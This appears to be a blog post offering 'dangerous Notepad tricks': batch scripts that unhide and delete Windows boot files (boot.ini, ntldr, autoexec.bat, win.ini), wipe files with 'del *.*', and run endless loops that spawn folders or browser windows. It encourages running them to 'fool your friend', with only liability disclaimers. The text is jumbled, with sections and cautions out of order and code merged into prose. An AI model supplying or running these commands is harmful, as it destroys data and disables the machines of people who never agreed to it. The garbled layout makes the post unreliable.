As you know Notepad can be used to make some dramatic changes in your
windows PC by using simple programming. Here I am gonna share some very
dangerous Notepad tricks. Sometimes these tricks make your PC dead for
ever or make a ram burst. Anyway don’t try it for a fun
Caution: Do at your own risk, We are not responsible for any damages or losses occur due to this trick.

You can fool your friend with this trick, but do at your own risk. It is not that much dangerous as first trick
It will do the job with in minutes
Caution: Do at your own risk, We are not responsible for any damages or losses occur due to this trick.
Hope you enjoyed this trick, share it to your friends and comment your opinions
Caution: Do at your own risk, We are not responsible for any damages or losses occur due to this trick.
Shutdown Computer forever
Make a notepad file and copy paste the given codes in it.@echo offSave the file as “Shutdown-forever.bat”. Running this file make your computer Shutdown forever. So run it if you don’t care it.
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini
Numerous Folders with in a minute
This trick will make numerous folders in your computer with in a minute, this trick will burst your computer ram. So create a notepad file and copy paste given code@echo offSave in “.bat” format
:top
md %random%
goto top
You can fool your friend with this trick, but do at your own risk. It is not that much dangerous as first trick
Delete all your system
You can delete all files in your hard disc with in minutes. Make a notepad file with following codedel *.*Save in “.bat” format
It will do the job with in minutes
Ram Crashing Trick
Just make a notepad file with the code:AIt will Crash your ram soon
start http://google.com/
goto A
Caution: Do at your own risk, We are not responsible for any damages or losses occur due to this trick.
Hope you enjoyed this trick, share it to your friends and comment your opinions
0 comments:
Post a Comment